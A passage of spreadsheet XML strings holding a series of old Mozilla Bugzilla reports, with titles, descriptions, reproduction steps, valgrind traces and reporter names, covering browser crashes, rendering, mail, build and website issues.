goo at&amp;t hobbit cpu
it incorrectly (I think) ends up as
http://www.google.com.au/search?hl=en&amp;q=at&amp;t%20%22hobbit%22%20cpu&amp;btnG=Google+Search&amp;meta=
with the '&amp;' between the 'at' and 't' as the value of the 'q' parameter which also causes the other parts of the 'q' value to be incorrectly interpreted by Google.
Reproducible: Always
Steps to Reproduce:
1. set up a bookmark with the location 'http://www.google.com.au/search?hl=en&amp;q=%s&amp;btnG=Google+Search&amp;meta='
2. set the bookmark keyword to 'goo'
3. type 'goo at&amp;t hobbit cpu' into the address bar
Actual Results:  
I got a search for the letters 'AT'
Expected Results:  
I should've got search results for 'AT&amp;T Hobbit CPU'</t>
  </si>
  <si>
    <t>jimmiejams</t>
  </si>
  <si>
    <t>CORE-224039</t>
  </si>
  <si>
    <t>crash in nsGenericHTMLElement::FindAttributeDependence if colgroup element has style attribute</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6a) Gecko/20031029
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6a) Gecko/20031029
A web page containing  crashes Mozilla.
It looks like the problem is in nsHTMLTableColElement.cpp the span_attribute
array isn't terminated with nsnull.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>ajfitzpatrick</t>
  </si>
  <si>
    <t>CORE-334971</t>
  </si>
  <si>
    <t>PS printing produces much lower quality output than without cairo</t>
  </si>
  <si>
    <t>OS: Fedora Core 3
STEPS TO REPRODUCE:
1)  Load https://bugzilla.mozilla.org/attachment.cgi?id=219297
2)  Print to file.
EXPECTED RESULTS: text is readable
ACTUAL RESULTS: With cairo text is very hard to read.
I'll attach the cairo and non-cairo postscript files.  Haven't done any digging into this yet.
I'll attach</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-952912</t>
  </si>
  <si>
    <t>System update check for NOFTU build</t>
  </si>
  <si>
    <t>Currently in bootstrap.js it only enable gaia.system.checkForUpdates when ftu is done. But there may be a chance the phone is booted without FTU.
We should also listen to ftuskip event here.</t>
  </si>
  <si>
    <t>alegnadise+moz</t>
  </si>
  <si>
    <t>CORE-481282</t>
  </si>
  <si>
    <t>xpconnect warning fix</t>
  </si>
  <si>
    <t>/Users/sayrer/dev/mozilla-central/js/src/xpconnect/src/nsXPConnect.cpp: 
In member function â€˜virtual nsresult nsXPConnect::Traverse(void* nsCycleCollectionTraversalCallback&amp;)â€™:
js/src/xpconnect/src/nsXPConnect.cpp:725: warning: â€˜clazzâ€™ may be used uninitialized in this function
js/src/xpconnect/src/nsXPConnect.cpp:724: warning: â€˜objâ€™ may be used uninitialized in this function</t>
  </si>
  <si>
    <t>atulagrwl</t>
  </si>
  <si>
    <t>SEAMONKEY-151899</t>
  </si>
  <si>
    <t>Show link target Page Info</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.1a) Gecko/20020614
BuildID:    2002061408
The Page/Frame Info is excellent to view the links/forms and form
elements/field names and so in of a page.
I sometimes just miss the display of the link-/form target
(_blank_topselfmymainwindow...). As I often have to create dynamic menus
with diffenrent targets I'd regard it a useful feature (better than always
checing through the generated html-code)
Reproducible: Always
Steps to Reproduce:
1. create an html page with some links and different targets
2. rightclick view page source
3. choose Links
Actual Results:  no. name address type are listed (is activated) 
Expected Results:  link/form target would be useful if displayed as well</t>
  </si>
  <si>
    <t>SOCORRO-481250</t>
  </si>
  <si>
    <t>Reduce the search to version only when branch is given too (make search faster)</t>
  </si>
  <si>
    <t>When you search for crashes on a specific branch and also select a version we shouldn't obey the branch selection in the code and only search for the given version.
One thing we should think about is what we wanna do when the given version is not from the selected branch. Shall we show the result for the version? For now we return zero results.</t>
  </si>
  <si>
    <t>CORE-223846</t>
  </si>
  <si>
    <t>AuthName with escaped  in it sets wrong realm</t>
  </si>
  <si>
    <t>if you go to:
http://gemal.dk/test/javajava.html
the realm is shown as \
when in IE it's shown as \bug 119924 which is correct
http log says:
3584[abd660]:   WWW-Authenticate: Basic realm=\bug 119924
0[2c3f98]:   challenge=Basic realm=\bug 119924
0[2c3f98]: nsHttpAuthCache::GetAuthEntryForDomain [host=gemal.dk:80 realm=\]
20031024</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-467003</t>
  </si>
  <si>
    <t>Get rid of Components.returnCode use in mailnews/ and mail/</t>
  </si>
  <si>
    <t>Components.returnCode was broken as long ago as bug 287107
The simple fix is to switch them over to throw.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-242616</t>
  </si>
  <si>
    <t>terra.com.br - a javascript blocks other browsers that arenÂ´t IE</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040206 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040206 Firefox/0.8
When I try to listen a song from the main Page I get a Windows saying that My
browser has no necessaries resources and tells me Use Microsoft Internet Explorer
Reproducible: Always
Steps to Reproduce:
1.Goto radio.terra.com.br
2.Click to listen Any Song in the main page
Actual Results:  
A JavaScript Message in POrtuguese:
Seu Computador nÃ£o possui recursos suficientes
Utilize Microsoft Internet Explorer
Expected Results:  
Load the WMP9 Plugin and start</t>
  </si>
  <si>
    <t>mavkampen</t>
  </si>
  <si>
    <t>CORE-386769</t>
  </si>
  <si>
    <t>Make setting innerHTML faster by caching innerHTML's parser and content sink</t>
  </si>
  <si>
    <t>While running the uBenchmarks at the URL above I get the following results:
IE7: DOM speed 511ms
Minefield(2007070304): DOM speed 482ms
Safari 3 beta: DOM speed 54ms
The DOM speed benchmark is just a tight loop of:
document.getElementById('speed_dom').innerHTML = Testing... (+i+/1000) 
faster in Safari
Entire test is below. 
function DOMSpeed() {
    var startTime = new Date() 
    for( var i = 0 i &lt;= 1000 i++ )
    {
		document.getElementById('speed_dom').innerHTML = Testing... (+i+/1000)
    }
    var endTime = new Date()
    document.getElementById('speed_dom').innerHTML = (endTime - startTime)
    document.getElementById('speed_total').innerHTML = eval(document.getElementById('speed_total').innerHTML) + (endTime - startTime)
}</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-436791</t>
  </si>
  <si>
    <t>wamubroker.com - WaMu Wholesale Lending rejects non-IE browsers</t>
  </si>
  <si>
    <t>STR:
1) Visit https://www.wamubroker.com/wholesale with any browser other than IE
ER: Allow me to visit and use site.
AR: Get redirected to Microsoft's IE download page.
Someone should tell Washington Mutual that they're excluding anyone not on Windows and as many as 40% of their potential Windows-using customers by blocking non-IE browsers.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-499368</t>
  </si>
  <si>
    <t>Revise Jetpack's clipboard support</t>
  </si>
  <si>
    <t>Bug 495532 introduced clipboard support based on a early draft of JEP 10. We've decided to take the API in a slightly different direction. The JEP as it stands today is where we'll go. Some changes regarding images may need to be made after further investigation.</t>
  </si>
  <si>
    <t>CORE-193391</t>
  </si>
  <si>
    <t>does not properly refresh borders</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030210
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030210
In the page http://fluteinstructor.com/ when the link is hit the box should
expand and the border should be solid. In Mozila the border is broken in spots.
Also if you force a refresh (minamize - maxamise or hide - show) the browser
the border is correct.
Reproducible: Always
Steps to Reproduce:
1.Hit link WINTER FLUTE SALE!!!
Actual Results:  
Box expanded and is missing border pieces.
Expected Results:  
Box should have a solid black border.</t>
  </si>
  <si>
    <t>unicomp</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-437098</t>
  </si>
  <si>
    <t>Enable junk token limits</t>
  </si>
  <si>
    <t>We started a discussion in bug 228675 about whether to enable by default the pruning of junk tokens in Thunderbird the capability of which is added in that bug. This bug continues that discussion and proposes that the token limit preference be set by default but to a relatively large value that will not affect the vast majority of users.
The relevant preference defined in bug 228675 is mailnews.bayesian_spam_filter.junk_maxtokens</t>
  </si>
  <si>
    <t>CORE-395590</t>
  </si>
  <si>
    <t>Entity ProtocolFlagError should be rephrased</t>
  </si>
  <si>
    <t>Created attachment 280268
the proposed change
The entity ProtocolFlagError 
ProtocolFlagError = Warning: Protocol handler for '%S' doesn't advertise a security policy.  While loads of such protocols are allowed for now this is deprecated.  Please see the documentation in nsIProtocolHandler.idl.
in the file /mozilla/dom/locales/en-US/chrome/security/caps.properties is unclear due to the ambiguity of the word â€˜loadsâ€™.  It could be interpreted as â€˜a lot of such protocols are allowedâ€™.
I propose it be changed to â€˜... loading of such protocols is allowed...â€™</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-526994</t>
  </si>
  <si>
    <t>Make treehydra compile with gcc 4.5 again</t>
  </si>
  <si>
    <t>Created attachment 410774
patch [pushed: comment 2]
gcc 4.5 has renamed one of the structs needed in plugin_init.</t>
  </si>
  <si>
    <t>CORE-281988</t>
  </si>
  <si>
    <t>Stop sharing DOM object wrappers between content and chrome</t>
  </si>
  <si>
    <t>Since the the beginning of time we've always shared JS wrapper for our native
DOM objects between content and chrome and this has always caused security
problems some we've found others I'm sure we haven't. Our approach in tackling
these problems so far has been to use Caillon's XPCNativeWrapper() helper in JS
to reach the actual DOM properties from chrome and not properties the page set.
But that means that developers need to be aware of this problem and lots are
but not all and we're all human so occatinally we forget to use the wrapper and
we introduce potential security problems.
Not sharing JS wrappers between content and chrome is fairly easy but it has
its consequences. Like XBL bindings must not be attached more than once just
because a content DOM object is accessed from chrome. And not only that but XBL
properties etc that were attached to the content DOM object won't be visible to
chrome.
I imagine that it's ok for us (at least from a technical point of view) to make
content XBL unreachable from chrome and that's what my patch does and it
doesn't appear to break anything obvious (that I've seen so far) but it may
break other apps who knows...
I'll attach a patch for others to look at that makes us not share JS wrappers
between content and chrome (but we'll still share among chrome windows and
among content windows of course). Please comment and share thoughts on this
issue. I believe that at some point in the future we're going to have to make a
change like this and the sooner we do that the easier it'll be for us. But
yeah it would've been even easier to do this 3 years ago...
We could though it won't be easy provide a mechanism for chrome code to
specify on a per JS stack frame basis (or whatever) that it wants to temporarily
share JS wrappers but I don't know yet that we'll need to do that.
Thoughts?</t>
  </si>
  <si>
    <t>CORE-22480</t>
  </si>
  <si>
    <t>Unclosed  causes  to remain open</t>
  </si>
  <si>
    <t>Here is the test case - found using Linux 2.2 glibc 2.1.2 M12.
--
This text block should be on the next line
--
When viewed from Netscape 4.7 and IE 5.5 the this text.... block is on the
next line - as though a  were automatically inserted. However in Mozilla it
is not and the this text block is on the same line as the Submit button.
Since both major browsers render it the same way I assume the This text...
block SHOULD be on the next line - however I couldn't figure out from the HTML
4 spec if this is correct or not.</t>
  </si>
  <si>
    <t>neilconway</t>
  </si>
  <si>
    <t>CALENDAR-349996</t>
  </si>
  <si>
    <t>Categories: multiselection should be enabled to remove more than one category</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060823 Calendar/0.3a2+
Sunbird has many predefined category
in my opinion most people will not use all of them so it will be nice if they can delete them at once
for example I removed all of them and then add my own with specified colors: 5-7 no more
Reproducible: Always</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-258872</t>
  </si>
  <si>
    <t>Threadless.com renders incorrectly in latest Firefox used to render fine.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040910 Firefox/0.10
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040910 Firefox/0.10
Links on left appear slightly off page in latest Firefox whereas in previous
Firefox versions such as 0.9.3 they used to appear fine.
Reproducible: Always
Steps to Reproduce:
1.Go to www.threadless.com</t>
  </si>
  <si>
    <t>k.oriordan</t>
  </si>
  <si>
    <t>CORE-113188</t>
  </si>
  <si>
    <t>Bad string usage in nsLocalFileUnix</t>
  </si>
  <si>
    <t>nsLocalFile(Unix)::AppendRelativePath uses Assign when it should be using Append
-- the latter is often faster with nsXPIDLString due to the IsDependentOn check.</t>
  </si>
  <si>
    <t>CORE-353547</t>
  </si>
  <si>
    <t>valgrind invalid stack memory writes in clipboard code over remote X</t>
  </si>
  <si>
    <t>I was running Mozilla in valgrind over a relatively slow remote X connection and I got the following valgrind warnings:
==15825== Invalid write of size 4
==15825==    at 0xB1FFA52: clipboard_contents_received(_GtkClipboard* _GtkSelectionData* void*) (nsClipboard.cpp:859)
==15825==    by 0x3C6DD7B8F2: selection_received (gtkclipboard.c:864)
==15825==    by 0x3C6C70B229: g_closure_invoke (gclosure.c:490)
==15825==    by 0x3C6C71B363: signal_emit_unlocked_R (gsignal.c:2438)
==15825==    by 0x3C6C71C7D4: g_signal_emit_valist (gsignal.c:2197)
==15825==    by 0x3C6C71E37F: g_signal_emit_by_name (gsignal.c:2265)
==15825==    by 0x3C6DE5FA14: gtk_selection_retrieval_report (gtkselection.c:2447)
==15825==    by 0x3C6DE5FBBE: _gtk_selection_notify (gtkselection.c:2249)
==15825==    by 0x3C6DE23E2C: _gtk_marshal_BOOLEAN__BOXED (gtkmarshalers.c:83)
==15825==    by 0x3C6C70B229: g_closure_invoke (gclosure.c:490)
==15825==    by 0x3C6C71B98C: signal_emit_unlocked_R (gsignal.c:2476)
==15825==    by 0x3C6C71C59E: g_signal_emit_valist (gsignal.c:2207)
==15825==    by 0x3C6C71C9B2: g_signal_emit (gsignal.c:2241)
==15825==    by 0x3C6DEFDE1D: gtk_widget_event_internal (gtkwidget.c:3751)
==15825==    by 0x3C6DE1EB19: gtk_main_do_event (gtkmain.c:1444)
==15825==    by 0x3C6D9466AB: gdk_event_dispatch (gdkevents-x11.c:2291)
==15825==    by 0x3C6C326CC9: g_main_context_dispatch (gmain.c:1916)
==15825==    by 0x3C6C329E44: g_main_context_iterate (gmain.c:2547)
==15825==    by 0x3C6C32A16C: g_main_loop_run (gmain.c:2751)
==15825==    by 0x3C6DE1EE92: gtk_main (gtkmain.c:1003)
==15825==    by 0xB1F9A27: nsAppShell::Run() (nsAppShell.cpp:139)
==15825==    by 0xB830E2B: nsAppStartup::Run() (nsAppStartup.cpp:151)
==15825==    by 0x410BFE: XRE_main (nsAppRunner.cpp:2438)
==15825==    by 0x40A069: main (nsBrowserApp.cpp:61)
==15825==  Address 0x7FEFFB140 is not stack'd malloc'd or (recently) free'd
==15825==
==15825== Invalid write of size 8
==15825==    at 0xB1FFA73: clipboard_contents_received(_GtkClipboard* _GtkSelectionData* void*) (nsClipboard.cpp:862)
==15825==    by 0x3C6DD7B8F2: selection_received (gtkclipboard.c:864)
==15825==    by 0x3C6C70B229: g_closure_invoke (gclosure.c:490)
==15825==    by 0x3C6C71B363: signal_emit_unlocked_R (gsignal.c:2438)
==15825==    by 0x3C6C71C7D4: g_signal_emit_valist (gsignal.c:2197)
==15825==    by 0x3C6C71E37F: g_signal_emit_by_name (gsignal.c:2265)
==15825==    by 0x3C6DE5FA14: gtk_selection_retrieval_report (gtkselection.c:2447)
==15825==    by 0x3C6DE5FBBE: _gtk_selection_notify (gtkselection.c:2249)
==15825==    by 0x3C6DE23E2C: _gtk_marshal_BOOLEAN__BOXED (gtkmarshalers.c:83)
==15825==    by 0x3C6C70B229: g_closure_invoke (gclosure.c:490)
==15825==    by 0x3C6C71B98C: signal_emit_unlocked_R (gsignal.c:2476)
==15825==    by 0x3C6C71C59E: g_signal_emit_valist (gsignal.c:2207)
==15825==    by 0x3C6C71C9B2: g_signal_emit (gsignal.c:2241)
==15825==    by 0x3C6DEFDE1D: gtk_widget_event_internal (gtkwidget.c:3751)
==15825==    by 0x3C6DE1EB19: gtk_main_do_event (gtkmain.c:1444)
==15825==    by 0x3C6D9466AB: gdk_event_dispatch (gdkevents-x11.c:2291)
==15825==    by 0x3C6C326CC9: g_main_context_dispatch (gmain.c:1916)
==15825==    by 0x3C6C329E44: g_main_context_iterate (gmain.c:2547)
==15825==    by 0x3C6C32A16C: g_main_loop_run (gmain.c:2751)
==15825==    by 0x3C6DE1EE92: gtk_main (gtkmain.c:1003)
==15825==    by 0xB1F9A27: nsAppShell::Run() (nsAppShell.cpp:139)
==15825==    by 0xB830E2B: nsAppStartup::Run() (nsAppStartup.cpp:151)
==15825==    by 0x410BFE: XRE_main (nsAppRunner.cpp:2438)
==15825==    by 0x40A069: main (nsBrowserApp.cpp:61)
==15825==  Address 0x7FEFFB148 is not stack'd malloc'd or (recently) free'd
My guess as to what happened is that:
 * we called gtk_clipboard_request_contents with a stack address
 * wait_for_retrieval timed out
 * clipboard_contents_received was called later and then accessed a stack data structure that was no longer valid.  (I'd have expected valgrind to say it's an address in the stack segment beyond the stack top but apparently not...)
It seems like either:
 * the retrieval_context object should be heap-allocated in case wait_for_retrieval doesn't wait long enough
 * we should cancel the request for the contents (if possible although I don't see a way looking at the API)</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-338344</t>
  </si>
  <si>
    <t>bl-vmware01 dougt-fc4.vmx is out of diskspace</t>
  </si>
  <si>
    <t>hardware: bl-vmware01
machine:  /VMs/dougt-fc4/dougt-fc4.vmx
is out of diskspace.  Please double available space or advise.
Doug</t>
  </si>
  <si>
    <t>CORE-381657</t>
  </si>
  <si>
    <t>offline cache isn't correctly updated when reading from the disk cache</t>
  </si>
  <si>
    <t>Created attachment 265734
v1
When the HTTP channel is serving data from the disk/memory caches ProcessResponse() is never called.  If that isn't called the offline cache listener is never installed.  This patch installs the offline cache listener in ReadFromCache().</t>
  </si>
  <si>
    <t>FIREFOX-342469</t>
  </si>
  <si>
    <t>cvs remove places l10n files from MOZILLA_1_8_BRANCH</t>
  </si>
  <si>
    <t>We should remove the places l10n files from the MOZILLA_1_8_BRANCH they're not
used and will thus not be properly maintained.
And given our QA/build requirements coming up making a build burn for unused
strings is probably a waste of time.
I changed the innards of #ifdef MOZ_PLACES in jar.mn to #error and removed
all the files that are in that #ifdef.
Patch coming up.</t>
  </si>
  <si>
    <t>TESTOPIA-458234</t>
  </si>
  <si>
    <t>Import/Export</t>
  </si>
  <si>
    <t>CSV importing fails for content-type text/x-comma-separated-values</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.8.1.15) Gecko/20080702 Firefox/2.0.0.15
Build Identifier: Testopia 2.0
Attempting to import a CSV test case file failed for wrong file type.
Reproducible: Always
Steps to Reproduce:
1. Use Firefox 2.0.0.15 and a CSV test case
2. File -&gt; import -&gt; cases and select the test case .csv
3. Submit.
Actual Results:  
Error message appears about wrong file format - expecting CSV/XML
Expected Results:  
CSV test case imported into a test plan.
tr_importer.cgi only checks for content-types of text/csv and text/xml
The content-type reported in my browser for the test case was text/x-comma-separated-values.
tr_importer.cgi should check for this content-type too.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-204229</t>
  </si>
  <si>
    <t>Multiple 251 SMTP Responses Causes Send Failure</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (OS/2 U Warp 4 en-US rv:1.0.0) Gecko/20020602
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3) Gecko/20030312
Our mail server uses 251 responses when forwarding mail to external servers. 
Mozilla is fine with sending to one address resulting in a 251 response that's
at the END of the list of recipients.  If however you send to multiple
addresses with 251 responses or send with a 251 response before the end of the
list you get an error.
I've not looked a lot at the Mozilla source but I did find code that seems to
explain the problem.  In nsSmtpProtocol.cpp there's a state system used to walk
through sending a message with SMTP.  In this section of code in the
SendRecipientResponse method:
1162    if(m_responseCode != 250 &amp;&amp; m_responseCode != 251)
1163     {
1164     nsresult rv = nsExplainErrorDetails(m_runningURL
NS_ERROR_SENDING_RCPT_COMMAND m_responseText.get())
1165     NS_ASSERTION(NS_SUCCEEDED(rv) failed to explain SMTP error)
1166 
1167     m_urlErrorState = NS_ERROR_BUT_DONT_SHOW_ALERT
1168     return(NS_ERROR_SENDING_RCPT_COMMAND)
1169     }
1170 
1171     if(m_addressesLeft &gt; 0)
1172     {
1173         /* more senders to RCPT to 
1174          */
1175         m_nextState = SMTP_SEND_MAIL_RESPONSE 
1176         return(0)
1177     }
1178 
251's are accepted as they should be.  But in line 1175 the state is set back
to the mail from response state which would seem to go back to the
SendMailResopnse method with this piece of code:
1101   if(m_responseCode != 250 || CHECK_SIMULATED_ERROR(SIMULATED_SEND_ERROR_11))
1102     {
1103         nsresult rv = nsExplainErrorDetails(m_runningURL
NS_ERROR_SENDING_FROM_COMMAND m_responseText.get())
1104         NS_ASSERTION(NS_SUCCEEDED(rv) failed to explain SMTP error)
1105 
1106         m_urlErrorState = NS_ERROR_BUT_DONT_SHOW_ALERT
1107         return(NS_ERROR_SENDING_FROM_COMMAND)
1108     }
The 251 would then be rejected at this point as it's not a valid response for
the MAIL FROM command.
Two possible solutions:
1.  Don't use exact error numbers...just stick to the major classes like 2xy for
positive completion responses per RFC 821.
2.  Change m_ResponseCode back to 250 at line 1175.
Like I said though I don't know the Mozilla source so I'm pretty much just
guessing here that I'm looking at the right piece of code.
Reproducible: Always
Steps to Reproduce:
1.  Find a mail server that uses 251 responses.
2.  Create and send a message to 2 or more recipients that will cause 251 responses
Actual Results:  
User not local will forward to  error message displayed in error message dialog.
Expected Results:  
Mozilla should have continued sending the message.</t>
  </si>
  <si>
    <t>jkoenin</t>
  </si>
  <si>
    <t>FIREFOX-309496</t>
  </si>
  <si>
    <t>Firefox 1.0.7 clean install installs nsIQTScriptablePlugin.xpt to plugins folder</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.12) Gecko/20050915 Firefox/1.0.7
When performing a clean install of Firefox 1.0.7 the installer places a copy of
nsIQTScriptablePlugin.xpt (Dated 09/19/05 8:37:37 AM) in the plugins directory.
This xpt is used by QuickTime and should be installed in the components folder
not the plugins folder.  If it should be included with the Firefox install at all.
This problem does not occur if you install 1.0.7 over a previous version of
Firefox and also does not occur with any previous version of Firefox.
This problem occurs with both Standard and Custom Installs.
Reproducible: Always
Steps to Reproduce:
1. Uninstall any previous version of Firefox if one is installed.
2. Delete the Mozilla Firefox program folder
3. Install Firefox 1.0.7 using Standard or Custom.
Actual Results:  
A copy of nsIQTScriptablePlugin.xpt (Dated 09/19/05 8:37:37 AM) is installed to
the plugins folder.
Expected Results:  
npnul32.dll (Dated 09/15/05 06:26:00 PM) should be the only file in the plugins
folder.
nsIQTScriptablePlugin.xpt (Dated 09/19/05 8:37:37 AM) if it is supposed to be
included with the Firefox install at all should be installed to the components
folder not the plugins folder.</t>
  </si>
  <si>
    <t>darklight_tr</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-220477</t>
  </si>
  <si>
    <t>convert nsIURILoader comments to doxygen-style comments</t>
  </si>
  <si>
    <t>CORE-300010</t>
  </si>
  <si>
    <t>Canceling a HTTP request while it is reading a partial cache entry does not cancel the corresponding transaction</t>
  </si>
  <si>
    <t>Canceling a HTTP request while it is reading a partial cache entry does not
cancel the corresponding transaction.
When a HTTP range request is used to complete a partial cache entry we first
issue a range request and if we get back a 206 then we read the cache and send
the partial cache data to our listener.  If the listener cancels the channel by
returning an error code (e.g. NS_BINDING_ABORTED) from their OnDataAvailable
then the network transaction will never be closed.  It will just sit around
consuming a persistent connection.  If this process is repeated then subsequent
requests to the same host may get stuck waiting for an available persistent
connection.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-319922</t>
  </si>
  <si>
    <t>Context menu for a tab with Bookmarks Manager or History has Reload Tab option</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8) Gecko/20051211 Camino/1.0b1+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8) Gecko/20051211 Camino/1.0b1+
With the bookmarks manager or history loaded in a tab the context manu for that tab will have Reload Tab enabled even though the reload button in the toolbar is disabled.  Choosing the option has no ill effects but it's unecessary.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-420007</t>
  </si>
  <si>
    <t>fxdbug-linux-tbox wont restart</t>
  </si>
  <si>
    <t>Doing kernel updates in bug#407796 to fx-linux-tbox and
fxdbug-linux-tbox. fx-linux-tbox rebooted just fine. However fxdbug-linux-tbox did not reboot. 
Can you please use VI server to poweroff/poweron this VM? 
(note: I would have done this myself in VIclient like I already did for other VMs earlier this week except that VIclient hangs at Loading inventory... Is the server ok?)
Marking as blocker because tree closed on trunk for this.</t>
  </si>
  <si>
    <t>BUGZILLA-365035</t>
  </si>
  <si>
    <t>sendmail cannot execute importxml.pl from any other path than the bugzilla directory</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.8) Gecko/20061113 Debian/1.7.8-1sarge8
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.8) Gecko/20061113 Debian/1.7.8-1sarge8
Hi!
I was trying to setup a bz 2.22 importxml script to receive bugs using sendmail I did this for previous versions one hundred times so I'm sure sendmail configuration was ok and permissions too.
After some debug I isolated the problem to something similar we had before in previous bugzilla versions: the path problem.
Executing importxml with sendmail user (daemon) from the path of bugzilla worked fine but when executed as daemon from any other folder it always failed with this message:
&gt; Can't find param named user_verify_class at 
&gt; /opt/testbugzilla/mozilla/webtools/bugzilla/Bugzilla/Config.pm line 171.
&gt; BEGIN failed--compilation aborted at 
&gt; /opt/testbugzilla/mozilla/webtools/bugzilla/Bugzilla/Auth.pm line 43.
&gt; Compilation failed in require at 
&gt; /opt/testbugzilla/mozilla/webtools/bugzilla/Bugzilla.pm line 28.
&gt; BEGIN failed--compilation aborted at 
&gt; /opt/testbugzilla/mozilla/webtools/bugzilla/Bugzilla.pm line 28.
&gt; Compilation failed in require at 
&gt; /opt/testbugzilla/mozilla/webtools/bugzilla/importxml.pl line 78.
&gt; BEGIN failed--compilation aborted at 
&gt; /opt/testbugzilla/mozilla/webtools/bugzilla/importxml.pl line 78.
After debugging importxml and finding out that the way to setup $::path on importxml.pl was working as expected I went to config.pm to see why the hell config.pm was not knowing his path.
Well the problem is that the parameters are loaded with a loop that iterates over: glob $libpath/Bugzilla/Config/*.pm 
Beign libpath defined at line 55 of Config.pm as .
So this is the fix I found and I suppouse it's a good one for everyone please let me know:
$ diff Bugzilla/Config.pm /tmp/bugzilla-2.22.1/Bugzilla/
5664d55
&lt;
&lt; # Because when bugs are imported libpath . makes impossible for
&lt; # the importxml.pl to load the parameters the next line check if
&lt; # $::path which is defined by importxml exist if so then libpath
&lt; # gets $::path value.
&lt; if ($::path) {
&lt;     $libpath=$::path
&lt; }
&lt;
My two cents for the monster :-).
Reproducible: Always
Steps to Reproduce:
1. Configure an alias in sendmail 8.12.7-77 on a SuSe 8.2 for importxml.pl
2. Run the script as sendmail user from anywhere except bugzilla path.
Actual Results:  
Can't find param named user_verify_class at /opt/testbugzilla/mozilla/webtools/bugzilla/Bugzilla/Config.pm line 171.
BEGIN failed--compilation aborted at /opt/testbugzilla/mozilla/webtools/bugzilla/Bugzilla/Auth.pm line 43.
Compilation failed in require at /opt/testbugzilla/mozilla/webtools/bugzilla/Bugzilla.pm line 28.
BEGIN failed--compilation aborted at /opt/testbugzilla/mozilla/webtools/bugzilla/Bugzilla.pm line 28.
Compilation failed in require at /opt/testbugzilla/mozilla/webtools/bugzilla/importxml.pl line 78.
BEGIN failed--compilation aborted at /opt/testbugzilla/mozilla/webtools/bugzilla/importxml.pl line 78.
Expected Results:  
no element found at line 1 column 0 byte -1 at /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/XML/Parser.pm line 185</t>
  </si>
  <si>
    <t>valorbugzilla</t>
  </si>
  <si>
    <t>CORE-174072</t>
  </si>
  <si>
    <t>When I went to about:plugins the file names come up unreadable.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.2b) Gecko/20021011
Build Identifier: Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.2b) Gecko/20021011
Hi
When I went to check what plugins I have configered for my browser I could not
read the c:\ file names they have lines thruogh them. Phoenix 0.2 alos has that
problem. I can not figer out why that is happening.
Reproducible: Always
Steps to Reproduce:
1.Type about:plugins in the url bar.
2.
3.
Actual Results:  
The same. 
Expected Results:  
To let me see the file names.</t>
  </si>
  <si>
    <t>wellander2</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-457928</t>
  </si>
  <si>
    <t>Create a Mozilla.com hosted localized FF3 landing page for every locale that does not already have one.</t>
  </si>
  <si>
    <t>â€¢	Page would look like the current home page with more introductory text introducing Firefox and its features.
â€¢	Include more language specific search terms in text to improve SEO for these landing pages (like navegador which is Spanish for browser).
â€¢	Consider launching Adwords program for each locale. 
o	Localizers translate four top performing text ads for Google Search network. 
â€¢	Affects 37 current Languages:  Afrikaans Albanian Arabic Belarusian Bengali Czech Estonian Frisian Galician Georgian Gujarati Hindi Icelandic Indonesian Kannada Kurdish Macedonian Marathi Mongolian Occitan Persian Punjabi Serbian Sinhala Slovak Slovenian Argentine/Mexican Spanish Swedish Tamil Telugu Thai Ukrainian Valencian Venda Vietnamese Zapoteco</t>
  </si>
  <si>
    <t>SEAMONKEY-89343</t>
  </si>
  <si>
